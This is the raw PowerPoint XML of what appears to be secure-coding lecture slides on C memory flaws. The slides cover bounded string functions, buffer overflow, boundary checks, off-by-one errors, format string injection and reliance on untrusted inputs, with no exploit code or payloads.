            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0"/>
              <a:t> Functions </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F0480E4-499C-6348-93E8-1327EFC5EFEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="544883" y="1609269"/>
            <a:ext cx="8154443" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>(dest_buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BUFF_SIZE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stdin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>(dest_buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BUFF_SIZE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>, format, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>(dest_buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src_buff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BUFF_SIZE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strncmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buff1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buff2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BUFF_SIZE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="4000" dirty="0"/>
              <a:t>If the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BUFF_SIZE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="4000" dirty="0"/>
              <a:t> argument is larger than the size of the buffer: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OVERFLOW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="4000" dirty="0"/>
              <a:t>!</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0914" y="1319323"/>
            <a:ext cx="3189889" cy="4931229"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2197720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1C49-BD32-784A-81DB-50C236981F37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="407095"/>
            <a:ext cx="10515600" cy="1014609"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check Boundaries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6432654-18C8-644A-9C6C-A828444E356B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1643998"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="4000" dirty="0"/>
              <a:t>A simple comparison against a known limit constant can go a long way to prevent serious logical attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="4000" dirty="0"/>
              <a:t>Pay special attention to comparison operators </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" sz="3600" dirty="0"/>
              <a:t>&lt; vs &lt;=, &lt;= can lead to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3600" u="sng" dirty="0"/>
              <a:t>off by one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="4000" dirty="0"/>
              <a:t>Make sure the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="4000" u="sng" dirty="0"/>
              <a:t>same constant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="4000" dirty="0"/>
              <a:t>is used to define buffer size and check boundaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3569821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AA3F-4DB3-FE47-9ED3-285D1E29677F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Memory Injection?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17B46F37-DD02-DE47-893D-573597592D1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Format String Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is a type of memory flaw caused by allowing user input in a format parameter.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B68B1FEB-DCA0-E647-A0D4-84DF1FE5A480}"/>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515651" y="2057400"/>
            <a:ext cx="9036484" cy="4518242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2228020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8506790"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MEMORY PROBLEM!</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880334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20C0E1-1AD9-5A43-81A3-5648FF1FEB67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="457246"/>
            <a:ext cx="12192000" cy="591244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256247"/>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4514909"/>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2C2C84D-D04A-F34D-803C-2F0E4D7C9F84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1525562"/>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7D219DE-4B40-944F-AADF-A3E12438DBEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5245594"/>
            <a:ext cx="12192000" cy="325925"/>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576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 of dangerous functions)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="740028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A9D0B3-9AB0-3E48-80D3-169BFB64EE11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="222929"/>
            <a:ext cx="12192000" cy="6457570"/>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1234023"/>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181629"/>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2C2C84D-D04A-F34D-803C-2F0E4D7C9F84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2299339"/>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7D219DE-4B40-944F-AADF-A3E12438DBEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4116313"/>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294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(incorrect calculation of buffer size)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3184879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8397F-95EA-F945-A99C-2A6A9BAF16F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="107602"/>
            <a:ext cx="12192000" cy="6537434"/>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318690"/>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40709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383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(Format String Injection)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26392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FADA-9348-7E49-984A-11398F0D69CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reliance on Untrusted Inputs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D39ABB64-6D16-2349-BCE0-32B733F95B99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2796000" y="1515126"/>
            <a:ext cx="2451158" cy="3511927"/>
            <a:chOff x="1330454" y="1615335"/>
            <a:chExt cx="2451158" cy="3511927"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="Picture 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06A9AE37-2145-9C4C-BC83-67F4276281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1468301" y="1615335"/>
              <a:ext cx="718457" cy="926275"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75013674-7775-EC40-9FE8-8DCFCB69DC18}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1330454" y="2488172"/>
              <a:ext cx="1173655" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>/restricted</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Graphic 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5AB5670-6DBD-6243-9168-816AC1756F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022" y="3819788"/>
              <a:ext cx="952500" cy="952500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="TextBox 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD484BFD-7ED3-4642-8443-E772034B8333}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1461532" y="4757930"/>
              <a:ext cx="960391" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Attacker</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Curved Connector 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C52721D-8D8E-444A-A815-8393BF6D18AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="6" idx="0"/>
              <a:endCxn id="5" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="1436135" y="3338641"/>
              <a:ext cx="962284" cy="10"/>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Callout 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E74D061-2B72-CF43-87C6-20F911F1E052}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2144228" y="3215593"/>
              <a:ext cx="1482058" cy="751042"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeEllipseCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -45278"/>
                <a:gd name="adj2" fmla="val 57632"/>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 I'm admin ;)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Oval Callout 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2086B177-20BA-E248-AEC2-DA3E21E8DA39}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2299554" y="1615335"/>
              <a:ext cx="1482058" cy="751042"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeEllipseCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -60069"/>
                <a:gd name="adj2" fmla="val 30113"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:alpha val="74000"/>
              </a:schemeClr>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 Hello admin!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A2A224C-161C-F649-B5AA-A207C5E648C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6209685" y="1603133"/>
            <a:ext cx="5247277" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
              <a:t>Reliance on Untrusted Inputs occurs when the software uses client side validation or simply stores variables used in a security decision somewhere where an attacker could change them.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="950917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67C47-D553-5745-BA62-C4B4735AF246}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="534096"/>
            <a:ext cx="12192000" cy="5832305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B25F90E2-D8DA-2D45-BCAA-02172DB37A30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2625578"/>
            <a:ext cx="12192000" cy="236620"/>
          </a:xfrm>
          <a:prstGeom prst="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0101B40-FCB6-6041-A453-DDFDD30117C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5517715"/>
            <a:ext cx="12192000" cy="244257"/>
          </a:xfrm>
          <a:prstGeom prst="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953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(Off by One)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="87080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771118"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Safe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> functions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>allow limiting the number of bytes read into the buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2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Even with safe functions special attention should be paid to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>size specified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, very important to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
